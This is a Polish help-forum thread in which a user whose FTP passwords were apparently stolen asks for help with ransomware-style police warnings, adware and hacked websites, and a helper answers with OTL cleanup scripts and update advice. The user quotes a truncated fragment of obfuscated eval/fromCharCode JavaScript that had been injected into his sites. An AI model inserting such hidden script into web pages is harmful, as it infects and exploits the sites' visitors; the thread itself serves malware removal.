Złośliwe oprogramowanie - komunikat policyjny - włamanie do TC

[siwy1991]

Witajcie,

mam dość powszechny problem dotyczący Cyberprzestępczości: mianowicie, posiadam zainstalowanego Firewalla Comodo. Podczas właczonego comodo system działa w miare poprawnie, natomiast jeśli go wyłączę od razu pojawia mi się komunikat o cyberprzestępczości. Dodatkowo posiadam program Total Commander, a w nim połączenia FTP do 10 różnych stron www. Śmiem wątpić że miałem włamanie na komputer i za jego pośrednictwem zostały wykradzione hasło do stron www z którymi się łączyłem, mianowicie każda ze stron została zawirusowana malwarem:

 

Coś ala:\

/*8f4d8e*/ ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0157,035,072,035,0141,0154,0140,0/*8f4d8e*/

 

W załączniku świeże logi. Mam też problem z reklamami "Browsers to save", strasznie mulą mi przeglądarke i zwiększają ładowanie stron!

 

Z góry dziękuję za pomoc.

OTL.Txt

Extras.Txt

[Landuss]

1. Uruchom OTL i w oknie Własne opcje skanowania/Skrypt wklej następujący tekst:

 

:OTL
O2 - BHO: (ByrrowSe2suave) - {78CD0B4A-6C07-8FA9-FE0B-6374BC98AE8B} - C:\ProgramData\ByrrowSe2suave\514fa67688a48.dll File not found
O2 - BHO: (Browyse2Saave) - {B3E11438-71A0-82E1-0BD7-FBD1DD500527} - C:\ProgramData\Browyse2Saave\51465449ad033.dll File not found
O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O20 - AppInit_DLLs: (c:\progra~2\browse~1\sprote~1.dll) - c:\progra~2\browse~1\sprote~1.dll ()
 
:Files
C:\Users\Maciek\3703186.dll
C:\ProgramData\Browyse2Saave
C:\Program Files (x86)\BrowseToSave
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ByrrowSe2suave
 
:Commands
[emptytemp]

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Kliknij w Wykonaj skrypt. Zatwierdź restart komputera.

 

2. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox.

   

3. Uruchom AdwCleaner z opcji Usuń.

 

4. Uruchamiasz OTL ponownie, tym razem wywołujesz opcję Skanuj. Pokazujesz nowy log z OTL (bez extras)

[siwy1991]

Cześć,

dziękuję za pomoc w załączniku nowe logi OTL, po twoich zaleceniach.

OTL.Txt

[Landuss]

Wszystko wygląda dobrze według najnowszego loga. Możemy kończyć:

 

1. Odinstal;uj RegClean Pro. Uruchom OTL i w sekcji Własne opcje skanowania / skrypt wklej:

 

:Files
C:\ProgramData\BetterSoft
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Browyse2Saave
C:\windows\tasks\schedule!3036567561.job
C:\windows\tasks\RegClean Pro_DEFAULT.job
C:\windows\tasks\RegClean Pro_UPDATES.job
C:\windows\DeleteOnReboot.bat
 
:Commands
[emptytemp]

 

Klik w Wykonaj skrypt.

 

2. Użyj opcji Sprzątanie w OTL.

 

3. Opróżnij przywracanie systemu: KLIK

 

4. Zaktualizuj wymienione programy do najnowszych wersji:

 

"{26A24AE4-039D-4CA4-87B4-2F86416026FF}" = Java 6 Update 26 (64-bit)

"{26A24AE4-039D-4CA4-87B4-2F83217000FF}" = Java 7

"{AC76BA86-7AD7-1045-7B44-AA1000000001}" = Adobe Reader X (10.1.0) - Polish

"Mozilla Thunderbird 17.0.4 (x86 pl)" = Mozilla Thunderbird 17.0.4 (x86 pl)

 

Szczegóły aktualizacyjne: KLIK